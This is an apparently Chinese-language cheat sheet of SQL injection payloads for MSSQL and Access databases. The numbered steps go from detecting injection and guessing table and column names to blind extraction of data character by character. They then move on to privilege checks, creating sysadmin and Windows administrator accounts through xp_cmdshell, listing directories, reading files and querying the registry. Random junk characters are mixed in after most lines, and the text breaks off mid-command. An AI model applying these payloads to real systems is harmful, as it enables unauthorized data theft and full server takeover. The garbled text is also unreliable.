1.判断是否有注入;and 1=1 ;and 1=2 5 ,B_u%bb
2.初步判断是否是mssql ;and user>0 SBk4_J/_
!6O(-S2A
3.注入参数是字符'and [查询条件] and ''=' ep)n_!$OH"
2,b(,3{`4:
4.搜索时没过滤参数的'and [查询条件] and '%25'=' U-(01-
;~ $'2f~U
5.判断数据库系统 J7Hl\Q[D1
~#[yJNYQ
;and (select count(*) from sysobjects)>0 mssql SaAFz&WRl
;LPfXpR
;and (select count(*) from msysobjects)>0 access b)5uf'?-
oC: {aK6\
S8wLmd>
5o'FS{6U
6.猜数据库 ;and (select Count(*) from [数据库名])>0 iDz++VNV
(!7sE9rP
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Ls$D$/:q?
}1c|gQ
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #64-~NVL_
p6]1w]*R
9.(1)猜字段的ascii值(access) u=?.}Pj
5z8d}
I
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z2_*%S@
=_ ./~
(2)猜字段的ascii值(mssql) 2Aazy'/
v6M6>&RR|
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F^t DL:
b_#m}yZ6
10.测试权限结构(mssql) p;59?
oim9<_
+\c5]`
F|o:W75
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 3G)#5Lf<
Yz/md1T$
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- RXpw!
\K{0L
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tqvN0vY5
0d"[l@UU0
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- u~M
q*
mPtZO*Fc
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Q_Q''j(r6b
hk(ZM#Bh
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- hl7bzKO*w
pMx*F@&nU
;and 1=(select IS_MEMBER('db_owner'));-- (cAIvgI
HZzD VCU
[LjT*bi
+j`5F3@
11.添加mssql和系统的帐户 av}k)ZT_
]Yn D
;exec master.dbo.sp_addlogin username;-- =)H.cuc
;exec master.dbo.sp_password null,username,password;-- \}u
Y'F
c)TPM/>(p
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- LEbB(x;@
N
,'GN[s
;exec master.dbo.xp_cmdshell 'net user username password @w#-aGJO
n/;WxnnQ
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Cx(>RXVoJ,
$Uq|w[LA
;exec master.dbo.xp_cmdshell 'net user username password /add';-- (Ft+uuG
Ga-k
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- IXMop7~
jH5
k
?K$(817
#l\=}#\1Wb
12.(1)遍历目录 U2tV4_ e
1y4|{7bb
;create table dirs(paths varchar(100), id int) }>pknc?
3Gp$a;g
;insert dirs exec master.dbo.xp_dirtree 'c:\' r_)' Ps
`quw9j9`C\
;and (select top 1 paths from dirs)>0 fa
jGZyd0:
{k>&?Vd!
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z,
zWuE3
:[p}
e8>})
lLX4Gq1
(2)遍历目录 O@T9x$
Gvt G(u~
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- O%WIf__Q
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 LiC*@W
!fV+z%:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 7X`g,b!
c?(4t67|
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 g+8OekzB5
-P(efYk
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 SXSgld2uS
h"[AOfTE$
j2t7'bO_
pxA?
13.mssql中的存储过程 DTX0
>2y':fO
xp_regenumvalues 注册表根键, 子键 Hck]aKI+
pQyK={7?`
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 e[{0)y>=
S*,17+6dV
xp_regread 根键,子键,键值名 paA(C|%{
KaLzg5is
;exec xp_regread HDz5&